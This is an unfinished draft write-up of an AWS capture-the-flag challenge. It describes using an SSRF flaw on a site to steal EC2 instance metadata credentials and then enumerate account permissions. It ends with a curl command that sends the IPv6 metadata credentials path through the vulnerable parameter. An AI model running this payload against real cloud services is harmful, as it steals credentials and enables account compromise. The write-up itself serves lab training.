AWSome challenges
AWS cloud jeopardy CTF. [DRAFT]
AWSome challenge - part1
Context
The local company has been compromised and the company’s critical informations are for sell in darknet markets. Certainly due to a CloudOps’ infrastructure misconfiguration…
The Admin has implemented a native WAF but was not sure about the root cause. Could you please audit their main website for the root cause and provide help?
url: ctf.livingoffthecloud.com
Nota:
- This was not shared during the challenge.
- This represent a simplified architecture and this shouldn’t be an example for your production applications.
Target audit
- An SSRF is possible on the website but allow only to make GET HTTP calls from the backend servers.
- Let’s explore that way to perform an exfiltration of instance metadata credentials.
Scaning the website ctf.livingoffthecloud.com:443
- The website
AWSome challenge - part2
Context
Thanks to the previous inital access, would you be able to go deeper?
url: ctf.livingoffthecloud.com
Target audit
Thanks to previous acquired cloud credentials, we will be able to scan the corresponding AWS account to discover what kind of permissions we currently have.
[~/hsr2023/awsome1/]$ BOMA_YE="http://[fd00:ec2::254]/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
[~/hsr2023/awsome1/]$ curl -6 "https://ctf.cvx.livingoffthecloud.com/free-slots=$BOMA_YE"